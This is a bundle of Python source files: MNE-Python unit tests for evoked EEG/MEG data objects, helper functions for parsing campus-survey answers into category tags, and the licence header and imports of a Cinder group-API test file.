import os.path as op
from copy import deepcopy
import warnings
import numpy as np
from scipy import fftpack
from numpy.testing import (assert_array_almost_equal, assert_equal,
assert_array_equal, assert_allclose)
from nose.tools import assert_true, assert_raises, assert_not_equal
from mne import (equalize_channels, pick_types, read_evokeds, write_evokeds,
grand_average, combine_evoked, create_info, read_events,
Epochs, EpochsArray)
from mne.evoked import _get_peak, Evoked, EvokedArray
from mne.io import read_raw_fif
from mne.tests.common import assert_naming
from mne.utils import (_TempDir, requires_pandas, slow_test, requires_version,
run_tests_if_main)
from mne.externals.six.moves import cPickle as pickle
# Always surface warnings so the tests can assert on them.
warnings.simplefilter('always')

# Paths to the shared fixture files used throughout this module.
base_dir = op.join(op.dirname(__file__), '..', 'io', 'tests', 'data')
fname = op.join(base_dir, 'test-ave.fif')
fname_gz = op.join(base_dir, 'test-ave.fif.gz')
raw_fname = op.join(base_dir, 'test_raw.fif')
event_name = op.join(base_dir, 'test-eve.fif')
def test_decim():
    """Test evoked decimation."""
    rng = np.random.RandomState(0)
    n_epochs, n_channels, n_times = 5, 10, 20
    dec_1, dec_2 = 2, 3
    decim = dec_1 * dec_2
    sfreq = 1000.
    sfreq_new = sfreq / decim
    data = rng.randn(n_epochs, n_channels, n_times)
    events = np.array([np.arange(n_epochs), [0] * n_epochs, [1] * n_epochs]).T
    info = create_info(n_channels, sfreq, 'eeg')
    # Keep lowpass well below the new Nyquist so decimate() does not warn.
    info['lowpass'] = sfreq_new / float(decim)
    epochs = EpochsArray(data, info, events)
    data_epochs = epochs.copy().decimate(decim).get_data()
    data_epochs_2 = epochs.copy().decimate(decim, offset=1).get_data()
    # Chained decimation by the two factors must equal one-shot decimation.
    data_epochs_3 = epochs.decimate(dec_1).decimate(dec_2).get_data()
    assert_array_equal(data_epochs, data[:, :, ::decim])
    assert_array_equal(data_epochs_2, data[:, :, 1::decim])
    assert_array_equal(data_epochs, data_epochs_3)

    # Now let's do it with some real data
    raw = read_raw_fif(raw_fname, add_eeg_ref=False)
    events = read_events(event_name)
    sfreq_new = raw.info['sfreq'] / decim
    raw.info['lowpass'] = sfreq_new / 4.  # suppress aliasing warnings
    picks = pick_types(raw.info, meg=True, eeg=True, exclude=())
    epochs = Epochs(raw, events, 1, -0.2, 0.5, picks=picks, preload=True,
                    add_eeg_ref=False)
    # Decimating epochs then averaging must match averaging then decimating.
    for offset in (0, 1):
        ev_ep_decim = epochs.copy().decimate(decim, offset).average()
        ev_decim = epochs.average().decimate(decim, offset)
        expected_times = epochs.times[offset::decim]
        assert_allclose(ev_decim.times, expected_times)
        assert_allclose(ev_ep_decim.times, expected_times)
        expected_data = epochs.get_data()[:, :, offset::decim].mean(axis=0)
        assert_allclose(ev_decim.data, expected_data)
        assert_allclose(ev_ep_decim.data, expected_data)
        assert_equal(ev_decim.info['sfreq'], sfreq_new)
        assert_array_equal(ev_decim.times, expected_times)
@requires_version('scipy', '0.14')
def test_savgol_filter():
    """Test savgol filtering.

    Compares FFT magnitudes before/after: the pass-band (<= h_freq / 2)
    must be preserved and the stop-band (>= 2 * h_freq) attenuated,
    while filtering a copy leaves the original untouched.
    """
    h_freq = 10.
    evoked = read_evokeds(fname, 0)
    freqs = fftpack.fftfreq(len(evoked.times), 1. / evoked.info['sfreq'])
    data = np.abs(fftpack.fft(evoked.data))
    match_mask = np.logical_and(freqs >= 0, freqs <= h_freq / 2.)
    mismatch_mask = np.logical_and(freqs >= h_freq * 2, freqs < 50.)
    # requesting a cutoff at the sampling frequency itself is invalid
    assert_raises(ValueError, evoked.savgol_filter, evoked.info['sfreq'])
    evoked_sg = evoked.copy().savgol_filter(h_freq)
    data_filt = np.abs(fftpack.fft(evoked_sg.data))
    # decent in pass-band
    assert_allclose(np.mean(data[:, match_mask], 0),
                    np.mean(data_filt[:, match_mask], 0),
                    rtol=1e-4, atol=1e-2)
    # suppression in stop-band
    assert_true(np.mean(data[:, mismatch_mask]) >
                np.mean(data_filt[:, mismatch_mask]) * 5)
    # original preserved
    assert_allclose(data, np.abs(fftpack.fft(evoked.data)), atol=1e-16)
def test_hash_evoked():
    """Test that evoked hashing and pickling are stable and data-sensitive."""
    first = read_evokeds(fname, 0)
    second = read_evokeds(fname, 0)
    # two independent reads of the same condition must hash identically
    assert_equal(hash(first), hash(second))
    # do NOT use assert_equal here, failing output is terrible
    assert_true(pickle.dumps(first) == pickle.dumps(second))
    # perturbing a single sample must change the hash
    second.data[0, 0] -= 1
    assert_not_equal(hash(first), hash(second))
@slow_test
def test_io_evoked():
    """Test IO for evoked data (fif + gz) with integer and str args.

    Round-trips evoked data through write/read (plain and gzipped),
    exercises condition selection by index, name and list, and checks
    filename-convention warnings plus MaxShield opt-in handling.
    """
    tempdir = _TempDir()
    ave = read_evokeds(fname, 0)
    write_evokeds(op.join(tempdir, 'evoked-ave.fif'), ave)
    ave2 = read_evokeds(op.join(tempdir, 'evoked-ave.fif'))[0]
    # This not being assert_array_equal due to windows rounding
    assert_true(np.allclose(ave.data, ave2.data, atol=1e-16, rtol=1e-3))
    assert_array_almost_equal(ave.times, ave2.times)
    assert_equal(ave.nave, ave2.nave)
    assert_equal(ave._aspect_kind, ave2._aspect_kind)
    assert_equal(ave.kind, ave2.kind)
    assert_equal(ave.last, ave2.last)
    assert_equal(ave.first, ave2.first)
    assert_true(repr(ave))
    # test compressed i/o
    ave2 = read_evokeds(fname_gz, 0)
    assert_true(np.allclose(ave.data, ave2.data, atol=1e-16, rtol=1e-8))
    # test str access
    condition = 'Left Auditory'
    assert_raises(ValueError, read_evokeds, fname, condition, kind='stderr')
    assert_raises(ValueError, read_evokeds, fname, condition,
                  kind='standard_error')
    ave3 = read_evokeds(fname, condition)
    assert_array_almost_equal(ave.data, ave3.data, 19)
    # test read_evokeds and write_evokeds
    aves1 = read_evokeds(fname)[1::2]
    aves2 = read_evokeds(fname, [1, 3])
    aves3 = read_evokeds(fname, ['Right Auditory', 'Right visual'])
    write_evokeds(op.join(tempdir, 'evoked-ave.fif'), aves1)
    aves4 = read_evokeds(op.join(tempdir, 'evoked-ave.fif'))
    # every selection style must yield the same conditions as aves1
    for aves in [aves2, aves3, aves4]:
        for [av1, av2] in zip(aves1, aves):
            assert_array_almost_equal(av1.data, av2.data)
            assert_array_almost_equal(av1.times, av2.times)
            assert_equal(av1.nave, av2.nave)
            assert_equal(av1.kind, av2.kind)
            assert_equal(av1._aspect_kind, av2._aspect_kind)
            assert_equal(av1.last, av2.last)
            assert_equal(av1.first, av2.first)
            assert_equal(av1.comment, av2.comment)
    # test warnings on bad filenames
    fname2 = op.join(tempdir, 'test-bad-name.fif')
    with warnings.catch_warnings(record=True) as w:
        warnings.simplefilter('always')
        write_evokeds(fname2, ave)
        read_evokeds(fname2)
    assert_naming(w, 'test_evoked.py', 2)
    # constructor
    assert_raises(TypeError, Evoked, fname)
    # MaxShield
    fname_ms = op.join(tempdir, 'test-ave.fif')
    assert_true(ave.info['maxshield'] is False)
    ave.info['maxshield'] = True
    ave.save(fname_ms)
    # reading MaxShield data requires explicit opt-in
    assert_raises(ValueError, read_evokeds, fname_ms)
    with warnings.catch_warnings(record=True) as w:
        aves = read_evokeds(fname_ms, allow_maxshield=True)
    assert_true(all('Elekta' in str(ww.message) for ww in w))
    assert_true(all(ave.info['maxshield'] is True for ave in aves))
    with warnings.catch_warnings(record=True) as w:
        aves = read_evokeds(fname_ms, allow_maxshield='yes')
    assert_equal(len(w), 0)
    assert_true(all(ave.info['maxshield'] is True for ave in aves))
def test_shift_time_evoked():
    """ Test for shifting of time scale.

    A relative shift backward, forward by twice the amount, then backward
    again must reproduce the original time axis; an absolute shift must
    place `first` at the requested time.
    """
    tempdir = _TempDir()
    # Shift backward
    ave = read_evokeds(fname, 0)
    ave.shift_time(-0.1, relative=True)
    write_evokeds(op.join(tempdir, 'evoked-ave.fif'), ave)
    # Shift forward twice the amount
    ave_bshift = read_evokeds(op.join(tempdir, 'evoked-ave.fif'), 0)
    ave_bshift.shift_time(0.2, relative=True)
    write_evokeds(op.join(tempdir, 'evoked-ave.fif'), ave_bshift)
    # Shift backward again
    ave_fshift = read_evokeds(op.join(tempdir, 'evoked-ave.fif'), 0)
    ave_fshift.shift_time(-0.1, relative=True)
    write_evokeds(op.join(tempdir, 'evoked-ave.fif'), ave_fshift)
    ave_normal = read_evokeds(fname, 0)
    ave_relative = read_evokeds(op.join(tempdir, 'evoked-ave.fif'), 0)
    # net relative shift is zero, so everything must match the original
    assert_true(np.allclose(ave_normal.data, ave_relative.data,
                            atol=1e-16, rtol=1e-3))
    assert_array_almost_equal(ave_normal.times, ave_relative.times, 10)
    assert_equal(ave_normal.last, ave_relative.last)
    assert_equal(ave_normal.first, ave_relative.first)
    # Absolute time shift
    ave = read_evokeds(fname, 0)
    ave.shift_time(-0.3, relative=False)
    write_evokeds(op.join(tempdir, 'evoked-ave.fif'), ave)
    ave_absolute = read_evokeds(op.join(tempdir, 'evoked-ave.fif'), 0)
    assert_true(np.allclose(ave_normal.data, ave_absolute.data,
                            atol=1e-16, rtol=1e-3))
    # the first sample should now sit at -0.3 s
    assert_equal(ave_absolute.first, int(-0.3 * ave.info['sfreq']))
def test_evoked_resample():
    """Test for resampling of evoked data.

    Upsamples by 2x, round-trips through disk, downsamples back and
    checks the result against the original.
    """
    tempdir = _TempDir()
    # upsample, write it out, read it in
    ave = read_evokeds(fname, 0)
    sfreq_normal = ave.info['sfreq']
    ave.resample(2 * sfreq_normal, npad=100)
    write_evokeds(op.join(tempdir, 'evoked-ave.fif'), ave)
    ave_up = read_evokeds(op.join(tempdir, 'evoked-ave.fif'), 0)
    # compare it to the original
    ave_normal = read_evokeds(fname, 0)
    # and compare the original to the downsampled upsampled version
    ave_new = read_evokeds(op.join(tempdir, 'evoked-ave.fif'), 0)
    ave_new.resample(sfreq_normal, npad=100)
    assert_array_almost_equal(ave_normal.data, ave_new.data, 2)
    assert_array_almost_equal(ave_normal.times, ave_new.times)
    assert_equal(ave_normal.nave, ave_new.nave)
    assert_equal(ave_normal._aspect_kind, ave_new._aspect_kind)
    assert_equal(ave_normal.kind, ave_new.kind)
    assert_equal(ave_normal.last, ave_new.last)
    assert_equal(ave_normal.first, ave_new.first)
    # for the above to work, the upsampling just about had to, but
    # we'll add a couple extra checks anyway
    assert_true(len(ave_up.times) == 2 * len(ave_normal.times))
    assert_true(ave_up.data.shape[1] == 2 * ave_normal.data.shape[1])
def test_evoked_detrend():
    """Test order-0 detrending against manual mean subtraction."""
    detrended = read_evokeds(fname, 0)
    manual = read_evokeds(fname, 0)
    detrended.detrend(0)
    # order-0 detrend is mean removal along the time axis
    manual.data -= np.mean(manual.data, axis=1)[:, np.newaxis]
    good_picks = pick_types(detrended.info, meg=True, eeg=True, exclude='bads')
    assert_true(np.allclose(detrended.data[good_picks], manual.data[good_picks],
                            rtol=1e-8, atol=1e-16))
@requires_pandas
def test_to_data_frame():
    """Test evoked Pandas exporter."""
    ave = read_evokeds(fname, 0)
    # asking for more picks than channels must be rejected
    assert_raises(ValueError, ave.to_data_frame, picks=np.arange(400))
    df = ave.to_data_frame()
    assert_true((df.columns == ave.ch_names).all())
    df = ave.to_data_frame(index=None).reset_index('time')
    assert_true('time' in df.columns)
    # exported values are scaled per channel type (factors 1e13 / 1e15;
    # presumably gradiometer/magnetometer units -- TODO confirm)
    assert_array_equal(df.values[:, 1], ave.data[0] * 1e13)
    assert_array_equal(df.values[:, 3], ave.data[2] * 1e15)
def test_evoked_proj():
    """Test SSP proj operations."""
    for proj in [True, False]:
        ave = read_evokeds(fname, condition=0, proj=proj)
        assert_true(all(p['active'] == proj for p in ave.info['projs']))
        # test adding / deleting proj
        if proj:
            # applied (active) projections can no longer be modified
            assert_raises(ValueError, ave.add_proj, [],
                          {'remove_existing': True})
            assert_raises(ValueError, ave.del_proj, 0)
        else:
            projs = deepcopy(ave.info['projs'])
            n_proj = len(ave.info['projs'])
            ave.del_proj(0)
            assert_true(len(ave.info['projs']) == n_proj - 1)
            # Test that already existing projections are not added.
            ave.add_proj(projs, remove_existing=False)
            assert_true(len(ave.info['projs']) == n_proj)
            ave.add_proj(projs[:-1], remove_existing=True)
            assert_true(len(ave.info['projs']) == n_proj - 1)
    ave = read_evokeds(fname, condition=0, proj=False)
    data = ave.data.copy()
    ave.apply_proj()
    # applying the projector must equal left-multiplying by it
    assert_allclose(np.dot(ave._projector, data), ave.data)
def test_get_peak():
    """Test peak getter."""
    evoked = read_evokeds(fname, condition=0, proj=True)
    # invalid windows, modes and channel types must raise
    assert_raises(ValueError, evoked.get_peak, ch_type='mag', tmin=1)
    assert_raises(ValueError, evoked.get_peak, ch_type='mag', tmax=0.9)
    assert_raises(ValueError, evoked.get_peak, ch_type='mag', tmin=0.02,
                  tmax=0.01)
    assert_raises(ValueError, evoked.get_peak, ch_type='mag', mode='foo')
    assert_raises(RuntimeError, evoked.get_peak, ch_type=None, mode='foo')
    assert_raises(ValueError, evoked.get_peak, ch_type='misc', mode='foo')
    ch_name, time_idx = evoked.get_peak(ch_type='mag')
    assert_true(ch_name in evoked.ch_names)
    assert_true(time_idx in evoked.times)
    ch_name, time_idx = evoked.get_peak(ch_type='mag',
                                        time_as_index=True)
    assert_true(time_idx < len(evoked.times))
    assert_equal(ch_name, 'MEG 1421')
    # exercise the private helper on a toy matrix
    data = np.array([[0., 1., 2.],
                     [0., -3., 0]])
    times = np.array([.1, .2, .3])
    ch_idx, time_idx = _get_peak(data, times, mode='abs')
    assert_equal(ch_idx, 1)
    assert_equal(time_idx, 1)
    ch_idx, time_idx = _get_peak(data * -1, times, mode='neg')
    assert_equal(ch_idx, 0)
    assert_equal(time_idx, 2)
    ch_idx, time_idx = _get_peak(data, times, mode='pos')
    assert_equal(ch_idx, 0)
    assert_equal(time_idx, 2)
    # mode must agree with the sign of the data
    assert_raises(ValueError, _get_peak, data + 1e3, times, mode='neg')
    assert_raises(ValueError, _get_peak, data - 1e3, times, mode='pos')
def test_drop_channels_mixin():
    """Test channels-dropping functionality."""
    evoked = read_evokeds(fname, condition=0, proj=True)
    drop_ch = evoked.ch_names[:3]
    ch_names = evoked.ch_names[3:]
    ch_names_orig = evoked.ch_names
    # dropping on a copy must not touch the original
    dummy = evoked.copy().drop_channels(drop_ch)
    assert_equal(ch_names, dummy.ch_names)
    assert_equal(ch_names_orig, evoked.ch_names)
    assert_equal(len(ch_names_orig), len(evoked.data))
    dummy2 = evoked.copy().drop_channels([drop_ch[0]])
    assert_equal(dummy2.ch_names, ch_names_orig[1:])
    # in-place drop
    evoked.drop_channels(drop_ch)
    assert_equal(ch_names, evoked.ch_names)
    assert_equal(len(ch_names), len(evoked.data))
    # invalid arguments must raise
    for ch_names in ([1, 2], "fake", ["fake"]):
        assert_raises(ValueError, evoked.drop_channels, ch_names)
def test_pick_channels_mixin():
    """Test channel-picking functionality."""
    evoked = read_evokeds(fname, condition=0, proj=True)
    ch_names = evoked.ch_names[:3]
    ch_names_orig = evoked.ch_names
    # picking on a copy must not touch the original
    dummy = evoked.copy().pick_channels(ch_names)
    assert_equal(ch_names, dummy.ch_names)
    assert_equal(ch_names_orig, evoked.ch_names)
    assert_equal(len(ch_names_orig), len(evoked.data))
    # in-place pick
    evoked.pick_channels(ch_names)
    assert_equal(ch_names, evoked.ch_names)
    assert_equal(len(ch_names), len(evoked.data))
    # pick by channel type
    evoked = read_evokeds(fname, condition=0, proj=True)
    assert_true('meg' in evoked)
    assert_true('eeg' in evoked)
    evoked.pick_types(meg=False, eeg=True)
    assert_true('meg' not in evoked)
    assert_true('eeg' in evoked)
    assert_true(len(evoked.ch_names) == 60)
def test_equalize_channels():
    """Test equalization of channels across evoked instances."""
    first = read_evokeds(fname, condition=0, proj=True)
    second = first.copy()
    expected_names = first.ch_names[2:]
    # drop a different leading channel from each copy
    first.drop_channels(first.ch_names[:1])
    second.drop_channels(second.ch_names[1:2])
    pair = [first, second]
    equalize_channels(pair)
    # after equalization both keep only the common channels
    for inst in pair:
        assert_equal(expected_names, inst.ch_names)
def test_arithmetic():
    """Test evoked arithmetic.

    Covers combine_evoked weighting schemes ('nave', 'equal', explicit
    lists), nave bookkeeping, comment generation for unnamed inputs, and
    grand_average over instances with mismatched channels.
    """
    ev = read_evokeds(fname, condition=0)
    ev1 = EvokedArray(np.ones_like(ev.data), ev.info, ev.times[0], nave=20)
    ev2 = EvokedArray(-np.ones_like(ev.data), ev.info, ev.times[0], nave=10)
    # combine_evoked([ev1, ev2]) should be the same as ev1 + ev2:
    # data should be added according to their `nave` weights
    # nave = ev1.nave + ev2.nave
    with warnings.catch_warnings(record=True):  # deprecation no weights
        ev = combine_evoked([ev1, ev2])
    assert_equal(ev.nave, ev1.nave + ev2.nave)
    assert_allclose(ev.data, 1. / 3. * np.ones_like(ev.data))
    # with same trial counts, a bunch of things should be equivalent
    for weights in ('nave', 'equal', [0.5, 0.5]):
        ev = combine_evoked([ev1, ev1], weights=weights)
        assert_allclose(ev.data, ev1.data)
        assert_equal(ev.nave, 2 * ev1.nave)
        ev = combine_evoked([ev1, -ev1], weights=weights)
        assert_allclose(ev.data, 0., atol=1e-20)
        assert_equal(ev.nave, 2 * ev1.nave)
    ev = combine_evoked([ev1, -ev1], weights='equal')
    assert_allclose(ev.data, 0., atol=1e-20)
    assert_equal(ev.nave, 2 * ev1.nave)
    ev = combine_evoked([ev1, -ev2], weights='equal')
    expected = int(round(1. / (0.25 / ev1.nave + 0.25 / ev2.nave)))
    assert_equal(expected, 27)  # this is reasonable
    assert_equal(ev.nave, expected)
    # default comment behavior if evoked.comment is None
    old_comment1 = ev1.comment
    old_comment2 = ev2.comment
    ev1.comment = None
    ev = combine_evoked([ev1, -ev2], weights=[1, -1])
    assert_equal(ev.comment.count('unknown'), 2)
    assert_true('-unknown' in ev.comment)
    assert_true(' + ' in ev.comment)
    ev1.comment = old_comment1
    ev2.comment = old_comment2
    # equal weighting
    ev = combine_evoked([ev1, ev2], weights='equal')
    assert_allclose(ev.data, np.zeros_like(ev1.data))
    # combine_evoked([ev1, ev2], weights=[1, 0]) should yield the same as ev1
    ev = combine_evoked([ev1, ev2], weights=[1, 0])
    assert_equal(ev.nave, ev1.nave)
    assert_allclose(ev.data, ev1.data)
    # simple subtraction (like in oddball)
    ev = combine_evoked([ev1, ev2], weights=[1, -1])
    assert_allclose(ev.data, 2 * np.ones_like(ev1.data))
    assert_raises(ValueError, combine_evoked, [ev1, ev2], weights='foo')
    assert_raises(ValueError, combine_evoked, [ev1, ev2], weights=[1])
    # grand average
    evoked1, evoked2 = read_evokeds(fname, condition=[0, 1], proj=True)
    ch_names = evoked1.ch_names[2:]
    evoked1.info['bads'] = ['EEG 008']  # test interpolation
    evoked1.drop_channels(evoked1.ch_names[:1])
    evoked2.drop_channels(evoked2.ch_names[1:2])
    gave = grand_average([evoked1, evoked2])
    assert_equal(gave.data.shape, [len(ch_names), evoked1.data.shape[1]])
    assert_equal(ch_names, gave.ch_names)
    assert_equal(gave.nave, 2)
    assert_raises(ValueError, grand_average, [1, evoked1])
def test_array_epochs():
    """Test creating evoked from array."""
    tempdir = _TempDir()
    # creating
    rng = np.random.RandomState(42)
    data1 = rng.randn(20, 60)
    sfreq = 1e3
    ch_names = ['EEG %03d' % (i + 1) for i in range(20)]
    types = ['eeg'] * 20
    info = create_info(ch_names, sfreq, types)
    evoked1 = EvokedArray(data1, info, tmin=-0.01)
    # save, read, and compare evokeds
    tmp_fname = op.join(tempdir, 'evkdary-ave.fif')
    evoked1.save(tmp_fname)
    evoked2 = read_evokeds(tmp_fname)[0]
    data2 = evoked2.data
    assert_allclose(data1, data2)
    assert_allclose(evoked1.times, evoked2.times)
    assert_equal(evoked1.first, evoked2.first)
    assert_equal(evoked1.last, evoked2.last)
    assert_equal(evoked1.kind, evoked2.kind)
    assert_equal(evoked1.nave, evoked2.nave)
    # now compare with EpochsArray (with single epoch)
    data3 = data1[np.newaxis, :, :]
    events = np.c_[10, 0, 1]
    evoked3 = EpochsArray(data3, info, events=events, tmin=-0.01).average()
    assert_allclose(evoked1.data, evoked3.data)
    assert_allclose(evoked1.times, evoked3.times)
    assert_equal(evoked1.first, evoked3.first)
    assert_equal(evoked1.last, evoked3.last)
    assert_equal(evoked1.kind, evoked3.kind)
    assert_equal(evoked1.nave, evoked3.nave)
    # test kind check
    assert_raises(TypeError, EvokedArray, data1, info, tmin=0, kind=1)
    assert_raises(ValueError, EvokedArray, data1, info, tmin=0, kind='mean')
    # test match between channels info and data
    ch_names = ['EEG %03d' % (i + 1) for i in range(19)]
    types = ['eeg'] * 19
    info = create_info(ch_names, sfreq, types)
    # a 19-channel info cannot describe 20-channel data
    assert_raises(ValueError, EvokedArray, data1, info, tmin=-0.01)
def test_time_as_index():
    """Test conversion of times to sample indices."""
    evoked = read_evokeds(fname, condition=0).crop(-.1, .1)
    indices = evoked.time_as_index([-.1, .1], use_rounding=True)
    # the crop limits must map onto the first and last samples
    assert_array_equal(indices, [0, len(evoked.times) - 1])
def test_add_channels():
    """Test evoked splitting / re-appending channel types.

    Splits an evoked into EEG / MEG / stim subsets, re-appends them with
    add_channels, and checks channel membership and data equality.

    Bug fixed: the eeg+meg membership check passed a bare generator to
    assert_true, which is always truthy, so it never tested anything.
    It now wraps the generator in all() and compares against the same
    eeg+meg reference used by the data check below.
    """
    evoked = read_evokeds(fname, condition=0)
    evoked.info['buffer_size_sec'] = None
    hpi_coils = [{'event_bits': []},
                 {'event_bits': np.array([256, 0, 256, 256])},
                 {'event_bits': np.array([512, 0, 512, 512])}]
    evoked.info['hpi_subsystem'] = dict(hpi_coils=hpi_coils, ncoil=2)
    evoked_eeg = evoked.copy().pick_types(meg=False, eeg=True)
    evoked_meg = evoked.copy().pick_types(meg=True)
    evoked_stim = evoked.copy().pick_types(meg=False, stim=True)
    evoked_eeg_meg = evoked.copy().pick_types(meg=True, eeg=True)
    evoked_new = evoked_meg.copy().add_channels([evoked_eeg, evoked_stim])
    assert_true(all(ch in evoked_new.ch_names
                    for ch in evoked_stim.ch_names + evoked_meg.ch_names))
    evoked_new = evoked_meg.copy().add_channels([evoked_eeg])
    # was: assert_true(ch in ... for ch in ...) -- a generator is always True
    assert_true(all(ch in evoked_new.ch_names
                    for ch in evoked_eeg_meg.ch_names))
    assert_array_equal(evoked_new.data, evoked_eeg_meg.data)
    assert_true(all(ch not in evoked_new.ch_names
                    for ch in evoked_stim.ch_names))
    # Now test errors
    evoked_badsf = evoked_eeg.copy()
    evoked_badsf.info['sfreq'] = 3.1415927
    evoked_eeg = evoked_eeg.crop(-.1, .1)
    assert_raises(RuntimeError, evoked_meg.add_channels, [evoked_badsf])
    assert_raises(AssertionError, evoked_meg.add_channels, [evoked_eeg])
    assert_raises(ValueError, evoked_meg.add_channels, [evoked_meg])
    assert_raises(AssertionError, evoked_meg.add_channels, evoked_badsf)
def test_evoked_baseline():
    """Test baseline correction on constant evoked data."""
    evoked = read_evokeds(fname, condition=0, baseline=None)
    # build an evoked whose data is constant (all ones)
    evoked = EvokedArray(np.ones_like(evoked.data), evoked.info,
                         evoked.times[0])
    # subtracting the full-window mean from constant data yields zeros
    evoked.apply_baseline((None, None))
    assert_allclose(evoked.data, np.zeros_like(evoked.data))
run_tests_if_main()
# --- file boundary (garbled "| |" separator removed) ---
import copy
def print_first(number, thing):
    """Print at most `number` leading elements of `thing`.

    Dicts print "key: value" pairs; sequences print the items themselves.
    Raises TypeError (an Exception subclass, so existing handlers still
    match) when `thing` is not iterable; an empty `thing` just prints a
    notice.

    Fixes: unreachable `return` after the raise removed; Python-2-only
    `iteritems()` replaced with `items()`; the dict branch previously
    printed one item too many (`count > iter_length` after increment).
    """
    if not hasattr(thing, '__iter__'):
        msg = "print_first_10: can't iterate over given thing..."
        print(msg)
        raise TypeError(msg)
    thing_len = len(thing)
    if thing_len == 0:
        print("Thing has no elements...")
        return
    iter_length = min(number, thing_len)
    if isinstance(thing, dict):
        for count, (k, v) in enumerate(thing.items()):
            if count >= iter_length:  # stop after exactly iter_length pairs
                break
            print("{}: {}".format(k, v))
    else:
        for t in thing[0:iter_length]:
            print(t)
def get_num_questions(question_types):
    """Return the indexes of all entries equal to "numerical"."""
    return [idx for idx, qtype in enumerate(question_types)
            if qtype == "numerical"]
def get_question_title(number, data):
    """Return the title (first field) of question `number`, taken from
    the first response row of `data`."""
    return data[0][number][0]
def get_responses_to_numbers(question_nums, data):
    """Collect the response column for every question index given."""
    return [get_responses_to_number(num, data) for num in question_nums]
def extract_vals_from_responses(*args):
    """For each response list given, pull out field [2] of every response."""
    assert(len(args) > 0)
    return [[response[2] for response in response_list]
            for response_list in args]
def extract_responses_from_profiles(question_num, *args):
    """For each profile list given, pull out entry `question_num` of
    every profile."""
    assert(len(args) > 0)
    return [[profile[question_num] for profile in profile_list]
            for profile_list in args]
def get_question_num_with_title(title, data):
    """Return the index of the first question whose title matches `title`.

    Searches the first profile in `data`.  Raises ValueError when no
    question carries the requested title; the original raised the
    undefined name `Error`, which crashed with NameError instead of the
    intended message.
    """
    profile = data[0]
    for index, answer in enumerate(profile):
        if answer[0] == title:
            return index
    raise ValueError("No question with title found!")
def get_indexes_of_invalid_repsonse_types(allowed_types, *response_lists):
    """For each response list, collect indexes whose exact type is not in
    `allowed_types` (deliberately uses type(), not isinstance())."""
    return [[idx for idx, response in enumerate(response_list)
             if type(response) not in allowed_types]
            for response_list in response_lists]
def merge_invalid_indexes(*invalid_indexes_lists):
    """Merge index lists into one sorted, duplicate-free list.

    Returns every index that appears in at least one input list, in
    ascending order; empty input (or all-empty lists) yields [].

    Fixes the Python-2-only `xrange` call; the scan from 0 to the global
    maximum is replaced by a set union, which produces the same output.
    """
    merged = set()
    for invalid_indexes_list in invalid_indexes_lists:
        merged.update(invalid_indexes_list)
    return sorted(merged)
def remove_entries_at_indexes(indexes, *lists):
    """Return copies of `lists` with the entries at `indexes` removed.

    `indexes` is expected in ascending order: each deletion shifts later
    positions left by one, which the running offset compensates for.
    An out-of-range index prints diagnostics and re-raises.
    """
    cleaned = []
    for original in lists:
        trimmed = copy.copy(original)
        for offset, index in enumerate(indexes):
            try:
                del trimmed[index - offset]
            except IndexError as e:
                print("Index error, trying to access index {} for list len {}".format(
                    index - offset, len(trimmed)
                ))
                print(trimmed)
                print(indexes)
                raise e
        cleaned.append(trimmed)
    return cleaned
def get_responses_to_number(question_num, data):
    """Return column `question_num` from every entry in `data`."""
    return [entry[question_num] for entry in data]
# (survey answer text, canonical tag) pairs consumed by parse_list_agruments.
# Campus communities a respondent may belong to.
community_matcher = (
    ("Athletics", "athletics"), ("Greek Life", "greek life"),
    ("Honors", "honors"), ("Student Life / RA", "student life / ra"),
    ("Service Clubs", "service clubs"),
    ("Academically-Oriented Clubs (ACS, Tri Beta, Phi Eta Sigma, Pre-Law, etc.)",
     "academic clubs"),
    ("Spiritual Life", "spiritual life"),
    ("Not Listed", "not listed")
)
# Demographic groups a respondent may identify with.
groups_matcher = (
    ("caucasians", "caucasian"),
    ("racial minorities", "racial minority"),
    ("people with disabilities", "disability"),
    ("people who identify as LGBT", "LGBT"),
    ("people of non-standard college age", "non_standard_age"),
    ("Men", "man"),
    ("Women", "woman"),
    ("athletes", "athlete"),
    ("individuals in Greek Life", "greek_life"),
    ("Honors Program Students", "honors"),
    ("Not listed", "not_listed")
)
# Sexual-assault experience options ("assalt" spelling kept: the name is
# referenced as-is by parse_sexual_assault).
sexual_assalt_matcher = (
    ("am someone who has", "experienced"),
    ("know someone who has", "know_someone")
)
def parse_communities(community_string):
    # Split a comma-joined community answer into canonical tags.
    return parse_list_agruments(community_string, community_matcher)
def parse_discrim_demographic(string):
    """Map a discrimination-demographic answer string to canonical tags."""
    discrim_demographic_matcher = (
        ("age", "age"), ("race", "race"), ("gender", "gender"),
        ("sexuality", "sexuality"), ("financial status", "financial_status"),
        ("place of birth", "place_of_birth"), ("disability", "disability"),
        ("involvement / lack of involvement with specific groups on campus",
         "campus_group_associations")
    )
    return parse_list_agruments(string, discrim_demographic_matcher)
def parse_discrim_involvement(string):
    # Discrimination-by-involvement answers reuse the community matcher.
    return parse_list_agruments(string, community_matcher)
def parse_groups(string):
    # Split a demographic-groups answer into canonical tags.
    return parse_list_agruments(string, groups_matcher)
def parse_sexual_assault(string):
    # Split a sexual-assault experience answer into canonical tags.
    return parse_list_agruments(string, sexual_assalt_matcher)
def parse_list_agruments(string, matcher_dict):
    """Parse a ", "-joined answer string into canonical tags.

    `matcher_dict` is an ordered sequence of (literal, tag) pairs; the
    answer is expected to list its literals in that same order.  Each
    time a literal matches the head of the remaining string, its tag is
    collected and the literal plus the ", " separator is consumed.

    Only change from the original: the local result variable no longer
    shadows the `list` builtin (function name kept for callers despite
    the "agruments" typo).
    """
    matches = []
    if len(string) == 0:
        return matches
    string_remainder = string
    remaining_len = len(string_remainder)
    for literal, tag in matcher_dict:
        literal_len = len(literal)
        # not enough text left for this literal to match
        if remaining_len < literal_len:
            continue
        if literal == string_remainder[:literal_len]:
            matches.append(tag)
            if (remaining_len - literal_len) > 0:
                # consume the matched literal plus the ", " separator
                string_remainder = string_remainder[literal_len + 2:]
                remaining_len = len(string_remainder)
    return matches
# --- file boundary (garbled "| |" separator removed) ---
# Copyright (C) 2016 EMC Corporation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Tests for group API.
"""
from unittest import mock
import ddt
from cinder import context
